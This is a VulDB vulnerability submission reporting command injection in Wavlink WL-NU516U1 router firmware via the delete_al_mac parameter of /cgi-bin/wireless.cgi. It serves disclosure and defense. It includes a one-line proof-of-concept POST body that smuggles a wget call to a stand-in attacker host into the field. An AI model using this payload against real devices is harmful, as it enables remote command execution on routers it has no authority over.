Submit #834003: Wavlink WL-NU516U1-A M16U1_V240425 Command Injectioninfo

TitleWavlink WL-NU516U1-A M16U1_V240425 Command Injection
DescriptionClass: Command Injection Description: Wavlink WL-NU516U1 firmware M16U1_V240425 contains a command injection vulnerability in /cgi-bin/wireless.cgi. When page=DeleteMac, function sub_402D1C reads delete_al_mac POST parameter and passes it to del_mac.sh via sprintf, executed through system(). The $(cmd) syntax bypasses the input filter. PoC: POST /cgi-bin/wireless.cgi body: page=DeleteMac&delete_list=AA&delete_al_mac=$(wget http://attacker:6666/callback)
Source⚠️ https://github.com/Svigo-o/Wavlink_vul/tree/main/wavlink-wl-nu516u1-wireless-deletemac-deletealmac-command-injection
User
 aimless (UID 89799)
Submission05/20/2026 10:43 (22 days ago)
Moderation06/07/2026 12:00 (18 days later)
StatusDuplicate
VulDB entry325828 [Wavlink NU516U1 M16U1_V240425 DeleteMac Page /cgi-bin/wireless.cgi sub_402D1C delete_list command injection]
Points0

PreviousOverviewNext

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!